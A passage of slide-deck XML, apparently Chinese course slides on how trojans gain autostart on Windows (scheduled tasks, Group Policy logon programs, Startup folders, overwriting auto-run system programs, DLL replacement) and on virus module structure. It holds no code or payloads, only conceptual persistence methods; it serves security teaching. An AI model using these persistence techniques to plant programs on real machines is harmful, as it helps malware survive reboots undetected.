        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1713515" y="4031703"/>
            <a:ext cx="5429250" cy="2249488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(5)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>　修改任务计划</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582614" y="1276349"/>
            <a:ext cx="8005762" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>在默认情况下，任务计划程序随</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>一起启动并在后台运行。如果把某个程序添加到计划任务文件夹，并将计划任务设置为“系统启动时”或“登录时”，这样也可以实现程序自启动。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72711" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="374793" y="3186573"/>
            <a:ext cx="4200525" cy="2981325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026"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0613" y="3186573"/>
            <a:ext cx="3687763" cy="315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5876051" y="6342523"/>
            <a:ext cx="1736886" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Windows 10</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0"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1606612" y="6342522"/>
            <a:ext cx="1823448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Windows XP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(6)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>　修改组策略</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668338" y="1352550"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>在“开始”→“运行”中输入“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>gpedit.msc" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>。按回车，打开系统组策略窗口，选择“计算机配置”→“管理模板”→“系统”→“登录”，双击右边的“在用户登录时运行这些程序”项。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73735" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1614488" y="3409950"/>
            <a:ext cx="5172075" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）修改组策略（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472802" y="1263541"/>
            <a:ext cx="8005762" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>打开其属性对话框， 选择“已启用”，再单击“显示”，会弹出“显示内容”对话框，列表中显示的便是藏身于此的自启动程序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>如果你也想在这里添加自启动项目，可单击“添加”在出现的“添加项目”对话框中输入可执行文件的完整路径和文件名，“确定”即可。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74759" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2036242" y="4023656"/>
            <a:ext cx="3990975" cy="2644775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(7)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>　修改启动文件夹</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547688" y="1390649"/>
            <a:ext cx="8077200" cy="4852495"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>当前登陆用户的“启动”文件夹</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>这是许多应用软件自启动的常用位置。当前登陆用户的“启动”文件夹一般在：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>C:\Documents and Settings\&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>用户名字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>&gt;\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>「开始」菜单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>对所有用户有效的启动文件夹</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>不管用户用什么身份登录系统，放入该文件夹的快捷方式总是自动启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>这是它与用户专有的启动文件夹的区别所在。该文件夹一般在：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>C:\Documents and Settings\All Users\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>「开始」菜单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600"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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(8)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 利用系统自动运行的程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76806" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="557213" y="1400175"/>
            <a:ext cx="8220075" cy="4762500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统中，有很多程序是可以自动运行的，如：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在对磁盘进行格式化后，总是要运行“磁盘扫描”程序（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Scandisk.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>按下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>F1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>键时，系统将运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Winhelp.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Hh.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>打开帮助文件；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统启动时，将自动启动系统栏程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SysTray.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、注册表检查程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>scanreg.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、计划任务程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>mstask.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、输入法程序、电源管理程序等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这为恶意程序提供了机会，通过覆盖相应文件就可获得自动启动的机会，而不必修改系统任何设置。</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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 替换系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77830" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560606" y="1480919"/>
            <a:ext cx="7772400" cy="4872584"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>这种方法通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>API HOOK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>启动，也称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>陷阱技术。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统中正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件（动态链接文件），如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>user32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这些随系统一起启动的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。启动之后，如果是系统正常的调用请求，它就把请求转到原先的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行处理，如果是约定的木马操作，则该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件就实现木马服务器端功能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>现代操作系统对此已有防护，已很难实施</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38601" y="1528544"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有些木马需要系统重启后运行或提升权限，如何做到？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）其它</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DEF8674-50A2-43EF-806F-A40658A11624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553882" y="1509192"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>典型计算机病毒基于功能模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>引导模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>搜索模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>感染模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>表现模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>标识模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F31CDD63-D770-4A81-9E9A-8472B947E524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
